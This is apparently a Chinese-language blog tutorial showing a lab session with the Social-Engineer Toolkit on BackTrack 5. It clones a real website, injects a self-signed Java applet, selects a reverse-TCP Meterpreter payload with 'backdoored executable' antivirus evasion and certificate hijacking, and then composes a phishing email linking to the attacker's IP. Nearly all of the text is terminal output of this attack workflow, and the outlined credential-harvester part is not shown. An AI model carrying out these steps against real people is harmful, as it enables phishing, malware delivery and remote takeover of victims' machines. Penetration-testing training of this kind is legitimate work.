4.社会工程学工具 内容简介 第一部分:Java Applet Attack Method 第二部分:Credential Harvester Attack Method 第一部分 Java Applet Attack Method 拓扑介绍 SET介绍 The SET is an advanced,multi-function,and easy to use computer assisted social engineering toolsset.It helps you to prepare the most effective way of exploiting the client-side application vulnerabilities and make a fascinating attempt to capture the target's confidential information (for example,e-mail passwords).Some of the most effcient and usefull attack methods employed by SET include,targeted phishing e-mails with a malicious file attachment,Java applet attacks,browser-based exploitation,gathering website credentials,creating infectious portable media (USB/DVD/CD),mass-mailer attacks,and other similar multi-attack web vectors.This combination of attack methods provides a powerfull platform to utilize and select the most persuasive technique that could perform an advanced attack against the human element.(SET是一个高级的,多功能的,并且易于使用的计算机社会工程学工具集。) root@bt:~# ifconfig eth1 eth1 Link encap:以太网 硬件地址 00:0c:29:f8:2a:28 inet 地址:162.168.1.102 广播:162.168.1.255 掩码:255.255.255.0 inet6 地址: fe80::20c:29ff:fef8:2a28/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 跃点数:1 接收数据包:20464 错误:0 丢弃:0 过载:0 帧数:0 发送数据包:38685 错误:0 丢弃:0 过载:0 载波:0 碰撞:0 发送队列长度:1000 接收字节:2995416 (2.9 MB) 发送字节:2585033 (2.5 MB) root@bt:~# netstat -r 内核 IP 路由表 Destination Gateway Genmask Flags MSS Window irtt Iface 162.168.1.0 * 255.255.255.0 U 0 0 0 eth1 default 162.168.1.2 0.0.0.0 UG 0 0 0 eth1 C:\Users\Smoke>ipconfig /all Windows IP 配置 主机名 . . . . . . . . . . . . . : Smoke-PC 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否 无线局域网适配器 无线网络连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : 1x1 11b/g/n Wireless LAN PCI Express Half Mini Card Adapter 物理地址. . . . . . . . . . . . . : 7C-E9-D3-F8-4B-87 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::c104:d994:990d:a57e%17(首选) IPv4 地址 . . . . . . . . . . . . : 162.168.1.101(首选) 子网掩码 . . . . . . . . . . . . : 255.255.255.0 获得租约的时间 . . . . . . . . . : 2015年4月15日 16:48:24 租约过期的时间 . . . . . . . . . : 2015年4月15日 23:48:23 默认网关. . . . . . . . . . . . . : 162.168.1.2 DHCP 服务器 . . . . . . . . . . . : 162.168.1.2 DHCPv6 IAID . . . . . . . . . . . : 578611667 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1A-CC-98-0C-3C-97-0E-18-96-17 DNS 服务器 . . . . . . . . . . . : 221.11.1.67 221.11.1.68 TCPIP 上的 NetBIOS . . . . . . . : 已启用 C:\Users\Smoke>ping www.baidu.com 正在 Ping www.a.shifen.com [61.135.169.121] 具有 32 字节的数据: 来自 61.135.169.121 的回复: 字节=32 时间=35ms TTL=54 来自 61.135.169.121 的回复: 字节=32 时间=41ms TTL=54 来自 61.135.169.121 的回复: 字节=32 时间=36ms TTL=54 来自 61.135.169.121 的回复: 字节=32 时间=35ms TTL=54 61.135.169.121 的 Ping 统计信息: 数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失), 往返行程的估计时间(以毫秒为单位): 最短 = 35ms,最长 = 41ms,平均 = 36ms 修改配置文件(1) root@bt:~# cd /pentest/exploits/set/ root@bt:/pentest/exploits/set# cd config/ root@bt:/pentest/exploits/set/config# ls mailing_list.txt set_config set_config.save set_config.save.1 slim_set.py root@bt:/pentest/exploits/set/config# vim set_config METASPLOIT_PATH=/pentest/exploits/framework3 ETTERCAP=ON EMAIL_PROVIDER=GMAIL SELF_SIGNED_APPLET=ON JAVA_ID_PARAM=Secure Java Applet root@bt:/pentest/exploits/set/config# cd .. root@bt:/pentest/exploits/set# ./set .--. .--. .-----. : .--': .--'`-. .-' `. `. : `; : : _`, :: :__ : : `.__.'`.__.' :_; [---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] [---] Development Team: JR DePre (pr1me) [---] [---] Development Team: Joey Furr (j0fer) [---] [---] Development Team: Thomas Werth [---] [---] Version: 2.4.1 [---] [---] Codename: 'Renegade' [---] [---] Report bugs: [email protected] [---] [---] Follow me on Twitter: dave_rel1k [---] [---] Homepage: http://www.secmaniac.com [---] Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.. Join us on irc.freenode.net in channel #setoolkit Select from the menu: 1) Social-Engineering Attacks 2) Fast-Track Penetration Testing 3) Third Party Modules 4) Update the Metasploit Framework 5) Update the Social-Engineer Toolkit 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1 .M"""bgd `7MM"""YMM MMP""MM""YMM ,MI "Y MM `7 P' MM `7 `MMb. MM d MM `YMMNq. MMmmMM MM . `MM MM Y , MM Mb dM MM ,M MM P"Ybmmd" .JMMmmmmMMM .JMML. [---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] [---] Development Team: JR DePre (pr1me) [---] [---] Development Team: Joey Furr (j0fer) [---] [---] Development Team: Thomas Werth [---] [---] Version: 2.4.1 [---] [---] Codename: 'Renegade' [---] [---] Report bugs: [email protected] [---] [---] Follow me on Twitter: dave_rel1k [---] [---] Homepage: http://www.secmaniac.com [---] Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.. Join us on irc.freenode.net in channel #setoolkit Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) SMS Spoofing Attack Vector 8) Wireless Access Point Attack Vector 9) Third Party Modules 99) Return back to the main menu. set> 2 The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim. The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload. The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload. The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website. The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different. The Man Left in the Middle Attack method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and in- corporate <script src="http://YOURIP/">. This could either be from a compromised site or through XSS. The Web-Jacking Attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast. The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful. 1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Man Left in the Middle Attack Method 6) Web Jacking Attack Method 7) Multi-Attack Web Method 8) Victim Web Profiler 9) Create or import a CodeSigning Certificate 99) Return to Main Menu set:webattack>1 The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack. The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone. The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality. 1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>2 Simply enter in the required fields, easy example below: Name: FakeCompany Organization: Fake Company Organization Name: Fake Company City: Cleveland State: Ohio Country: US Is this correct: yes [!] *** WARNING *** [!] IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk [!] *** WARNING *** 您的名字与姓氏是什么? [Unknown]: cisco 您的组织单位名称是什么? [Unknown]: cisco 您的组织名称是什么? [Unknown]: cisco 您所在的城市或区域名称是什么? [Unknown]: bj 您所在的州或省份名称是什么? [Unknown]: bj 该单位的两字母国家代码是什么 [Unknown]: cn CN=cisco, OU=cisco, O=cisco, L=bj, ST=bj, C=cn 正确吗? [否]: y 警告: 签名者证书将在六个月内过期。 [*] Java Applet is now signed and will be imported into the website [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:http://www.baidu.com [*] Cloning the website: http://www.baidu.com [*] This could take a little bit... [*] Injecting Java Applet attack into the newly cloned website. [*] Filename obfuscation complete. Payload name is: IierAbDuaKTT [*] Malicious java applet website prepped for deployment What payload do you want to generate: Name: Description: 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Bind Shell Execute payload and create an accepting port on remote system 5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline 6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline 7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter 8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports 9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter 10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter 11) SE Toolkit Interactive Shell New custom interactive reverse shell designed for SET 12) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP 13) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec (A/V Safe) 14) Import your own executable Specify a path for your own executable set:payloads>2 Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best. 1) avoid_utf8_tolower (Normal) 2) shikata_ga_nai (Very Good) 3) alpha_mixed (Normal) 4) alpha_upper (Normal) 5) call4_dword_xor (Normal) 6) countdown (Normal) 7) fnstenv_mov (Normal) 8) jmp_call_additive (Normal) 9) nonalpha (Normal) 10) nonupper (Normal) 11) unicode_mixed (Normal) 12) unicode_upper (Normal) 13) alpha2 (Normal) 14) No Encoding (None) 15) Multi-Encoder (Excellent) 16) Backdoored Executable (BEST) set:encoding>16 set:payloads> PORT of the listener [443]: [*] Generating x64-based powershell injection code... /bin/sh: /pentest/exploits/framework3msfvenom: 没有那个文件或目录 [*] Generating x86-based powershell injection code... /bin/sh: /pentest/exploits/framework3msfvenom: 没有那个文件或目录 [*] Finished generating shellcode powershell injection attack and is encoded to bypass excution restriction policys... [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... [*] Backdoor completed successfully. Payload is now hidden within a legit executable. [*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding. [-] Packing the executable and obfuscating PE file randomly, one moment. [*] Digital Signature Stealing is ON, hijacking a legit digital certificate [*] Generating OSX payloads through Metasploit... [*] Generating Linux payloads through Metasploit... *************************************************** Web Server Launched. Welcome to the SET Web Attack. *************************************************** [--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--] [-] Launching MSF Listener... [-] This may take a few to load MSF... Social Engineer Toolkit Mass E-Mailer There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list. What do you want to do: 1. E-Mail Attack Single Email Address 2. E-Mail Attack Mass Mailer 99. Return to main menu. set:mailer>1 set:phishing> Send email to:[email protected] set:phishing>1 set:phishing> Your gmail email address: :[email protected] Email password: set:phishing> Flag this message/s as high priority? [yes|no]:yes set:phishing> Email subject:pls check this sites set:phishing> Send the message as html or plain? 'h' or 'p' [p]: set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:pls check this sites Next line of the body: http://162.168.1.102 Next line of the body: ^C
标签:BT5,2011.4,set,JAVA,Normal,Windows,---,Attack,SET From: https://www.cnblogs.com/smoke520/p/18370545